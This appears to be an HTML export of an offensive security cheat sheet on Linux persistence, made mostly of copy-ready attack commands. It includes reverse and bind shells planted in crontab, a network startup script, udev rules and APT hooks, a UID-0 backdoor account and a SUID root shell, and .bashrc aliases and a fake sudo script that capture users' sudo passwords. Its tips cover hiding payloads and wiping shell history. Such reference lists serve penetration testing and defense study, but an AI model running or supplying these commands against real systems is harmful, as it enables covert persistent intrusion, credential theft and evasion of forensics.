<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Linux - Persistence</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="095d9216-af9d-4e91-8ca3-35d3f9c2e47a" class="page sans"><header><h1 class="page-title">Linux - Persistence</h1></header><div class="page-body"><hr id="ca3be4a2-7a05-43d5-a2f2-eafb8a901018"/><h1 id="20bde712-e5d2-43be-9525-3d1ef1c2b50a" class="">Summary</h1><nav id="6217b2a6-de0f-4da4-b3ee-c0ba2b54fde4" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#20bde712-e5d2-43be-9525-3d1ef1c2b50a">Summary</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#50105b56-bb09-403c-90ab-cfe58ce75fd4">Basic reverse shell</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#d11b6bb3-7cca-4bb8-817b-c8365aa4d925">Add a root user</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#b4684452-feda-4656-8ff0-af9e7f52b874">Suid Binary</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#dbf95075-1a12-47f7-a9e0-6f928afbeb75">Crontab - Reverse shell</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#cb038cc8-49b1-45db-9cbe-b25234cf7c30">Backdooring a user&#x27;s bash_rc</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#1ca47925-48f6-42dd-a462-12d2e73d085d">Backdooring a startup service</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#0522c7b9-69d5-46ad-a2e6-1d072f1de238">Backdooring a user startup file</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#706b3a38-cbd3-4219-b599-d1601a6e8fb1">Backdooring a driver</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#de14cdc3-ff3e-4323-a4f6-4f8d40c4d48e">Backdooring the APT</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#276a7e83-ddb0-4033-a180-3350efb4fbb8">Backdooring the SSH</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#713fc622-1f0f-4220-b6d9-360615a2a9dd">Tips</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#42b76478-1312-4058-b899-e27bb4d53623">References</a></div></nav><h2 id="50105b56-bb09-403c-90ab-cfe58ce75fd4" class="">Basic reverse shell</h2><pre id="5d721e6a-fd9d-4275-a0be-6de82b842708" class="code"><code>ncat --udp -lvp 4242
ncat --sctp -lvp 4242
ncat --tcp -lvp 4242</code></pre><h2 id="d11b6bb3-7cca-4bb8-817b-c8365aa4d925" class="">Add a root user</h2><pre id="0f7f6a78-5738-44cf-afc1-c247572f5b54" class="code"><code>sudo useradd -ou 0 -g 0 john
sudo passwd john
echo &quot;linuxpassword&quot; | passwd --stdin john</code></pre><h2 id="b4684452-feda-4656-8ff0-af9e7f52b874" class="">Suid Binary</h2><pre id="60520e51-087c-4ce0-8d35-d39d8bab672f" class="code"><code>TMPDIR2=&quot;/var/tmp&quot;
echo &#x27;int main(void){setresuid(0, 0, 0);system(&quot;/bin/sh&quot;);}&#x27; &gt; $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2&gt;/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant</code></pre><h2 id="dbf95075-1a12-47f7-a9e0-6f928afbeb75" class="">Crontab - Reverse shell</h2><pre id="051fc278-42f9-4851-adf3-87bd1a3740a6" class="code"><code>(crontab -l ; echo &quot;@reboot sleep 200 &amp;&amp; ncat 192.168.1.2 4242 -e /bin/bash&quot;)|crontab 2&gt; /dev/null</code></pre><h2 id="cb038cc8-49b1-45db-9cbe-b25234cf7c30" class="">Backdooring a user&#x27;s bash_rc</h2><p id="9b286960-b672-4d2a-b2cd-5e87163d83ea" class="">(FR/EN Version)</p><pre id="ae9e923a-b43d-4d4f-bab2-bf7f8addad09" class="code"><code>TMPNAME2=&quot;.systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0&quot;
cat &lt;&lt; EOF &gt; /tmp/$TMPNAME2
  alias sudo=&#x27;locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = &quot;en&quot; ]; then echo -n &quot;[sudo] password for \$USER: &quot;;fi;if [ \$locale  = &quot;fr&quot; ]; then echo -n &quot;[sudo] Mot de passe de \$USER: &quot;;fi;read -s pwd;echo; unalias sudo; echo &quot;\$pwd&quot; | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash &gt; /dev/null &amp;&amp; /usr/bin/sudo -S &#x27;
EOF
if [ -f ~/.bashrc ]; then
    cat /tmp/$TMPNAME2 &gt;&gt; ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
    cat /tmp/$TMPNAME2 &gt;&gt; ~/.zshrc
fi
rm /tmp/$TMPNAME2</code></pre><p id="ad5308dc-5b10-4230-b40f-a95b86878408" class="">or add the following line inside its .bashrc file.</p><pre id="478d54d2-dedd-4579-9939-1d569da58028" class="code"><code>$ chmod u+x ~/.hidden/fakesudo
$ echo &quot;alias sudo=~/.hidden/fakesudo&quot; &gt;&gt; ~./bashrc</code></pre><p id="c4bdfc34-7cb1-483d-b8e7-b523ef4c566f" class="">and create the <code>fakesudo</code> script.</p><pre id="f8a936a6-2f40-4cd1-ac6b-8ccf6e4d9a01" class="code"><code>read -sp &quot;[sudo] password for $USER: &quot; sudopass
echo &quot;&quot;
sleep 2
echo &quot;Sorry, try again.&quot;
echo $sudopass &gt;&gt; /tmp/pass.txt

/usr/bin/sudo $@</code></pre><h2 id="1ca47925-48f6-42dd-a462-12d2e73d085d" class="">Backdooring a startup service</h2><pre id="f321743d-2198-4833-a265-116e870d1b3c" class="code"><code>RSHELL=&quot;ncat $LMTHD $LHOST $LPORT -e \&quot;/bin/bash -c id;/bin/bash\&quot; 2&gt;/dev/null&quot;
sed -i -e &quot;4i \$RSHELL&quot; /etc/network/if-up.d/upstart</code></pre><h2 id="0522c7b9-69d5-46ad-a2e6-1d072f1de238" class="">Backdooring a user startup file</h2><p id="5d2438aa-c200-41c7-9972-9dccddf1f5f3" class="">Linux, write a file in <code>~/.config/autostart/NAME_OF_FILE.desktop</code></p><pre id="d10855d2-bc3f-4fb1-814b-3017f7d181dd" class="code"><code>In : ~/.config/autostart/*.desktop

[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false</code></pre><h2 id="706b3a38-cbd3-4219-b599-d1601a6e8fb1" class="">Backdooring a driver</h2><pre id="ec572b9d-c608-4b77-a46e-29b44ef3466d" class="code"><code>echo &quot;ACTION==\&quot;add\&quot;,ENV{DEVTYPE}==\&quot;usb_device\&quot;,SUBSYSTEM==\&quot;usb\&quot;,RUN+=\&quot;$RSHELL\&quot;&quot; | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules &gt; /dev/null</code></pre><h2 id="de14cdc3-ff3e-4323-a4f6-4f8d40c4d48e" class="">Backdooring the APT</h2><p id="483a0522-73a6-4630-82df-3f249ed616d3" class="">If you can create a file on the apt.conf.d directory with: <code>APT::Update::Pre-Invoke {&quot;CMD&quot;};</code> Next time &quot;apt-get update&quot; is done, your CMD will be executed!</p><pre id="0c25331d-26f3-4b7d-afb0-08e1ccdcd22f" class="code"><code>echo &#x27;APT::Update::Pre-Invoke {&quot;nohup ncat -lvp 1234 -e /bin/bash 2&gt; /dev/null &amp;&quot;};&#x27; &gt; /etc/apt/apt.conf.d/42backdoor</code></pre><h2 id="276a7e83-ddb0-4033-a180-3350efb4fbb8" class="">Backdooring the SSH</h2><p id="714b5cc1-763d-44fa-bf29-7039d8f80642" class="">Add an ssh key into the <code>~/.ssh</code> folder.</p><ol id="44e524a6-514c-4d53-8b43-5061a065852a" class="numbered-list" start="1"><li><code>ssh-keygen</code></li></ol><ol id="d0f138d6-46ea-4eb7-9940-0a046f71008a" class="numbered-list" start="2"><li>write the content of <code>~/.ssh/id_rsa.pub</code> into <code>~/.ssh/authorized_keys</code></li></ol><ol id="572d5ae7-dc79-4639-89e4-6b65473b85ac" class="numbered-list" start="3"><li>set the right permission, 700 for ~/.ssh and 600 for authorized_keys</li></ol><h2 id="713fc622-1f0f-4220-b6d9-360615a2a9dd" class="">Tips</h2><p id="4fc491be-a601-4526-bded-0e888b364a9c" class="">Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.</p><pre id="f227fe64-9391-457c-909f-63ffb400aa7d" class="code"><code>#[2J[2J[2J[2H[2A# Do not remove. Generated from /etc/issue.conf by configure.</code></pre><p id="0b4f4151-7743-4b26-911b-447959a8ba29" class="">Hide in plain sight using zero width spaces in filename.</p><pre id="1aa06ec0-bae8-4732-a7f6-bd4b59e328d6" class="code"><code>touch $(echo -n &#x27;index\u200D.php&#x27;) index.php</code></pre><p id="3c24c590-917e-4a91-92cc-dcca96e1fc49" class="">Clear the last line of the history.</p><pre id="e919c69b-a8bc-4747-9c71-ec9755ab5d73" class="code"><code>history -d $(history | tail -2 | awk &#x27;{print $1}&#x27;) 2&gt; /dev/null</code></pre><p id="644d113d-e2b0-4ce6-80f6-7d12d5612a75" class="">Clear history</p><pre id="d4d1223f-8414-49b7-8ce2-c0ab8cd542d1" class="code"><code>[SPACE] ANY COMMAND
or
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTFILE; CTRL-D
or
kill -9 $$
or
echo &quot;&quot; &gt; ~/.bash_history
or
rm ~/.bash_history -rf
or
history -c
or
ln /dev/null ~/.bash_history -sf</code></pre><p id="db668dad-e094-404e-8bb5-300670e2a90e" class="">The following directories are temporary and usually writeable</p><pre id="1080ac85-6eec-4c11-bcb5-463fcc5b4e41" class="code"><code>/var/tmp/
/tmp/
/dev/shm/</code></pre><h2 id="42b76478-1312-4058-b899-e27bb4d53623" class="">References</h2><ul id="e9913aaf-fd57-474d-9880-e895c6c981d1" class="bulleted-list"><li><a href="https://twitter.com/RandoriSec/status/1036622487990284289">@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289</a></li></ul><ul id="aee389f4-ed68-40c1-a46c-4bfd630ad8b4" class="bulleted-list"><li><a href="https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/">https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/</a></li></ul><ul id="26419bfe-5908-4105-a06b-017116d81bd2" class="bulleted-list"><li><a href="http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html">http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html</a></li></ul><ul id="1bd46235-e43a-4228-8516-2cd9e673c3a7" class="bulleted-list"><li><a href="http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/">http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/</a></li></ul><ul id="ef33325e-c8a3-4f8a-aa29-6da05d5ae4bd" class="bulleted-list"><li><a href="file:///C:/hackz/PayloadsAllTheThings-master/PayloadsAllTheThings-master/Methodology%20and%20Resources/#no_source_code">Pouki from JDI</a></li></ul></div></article></body></html>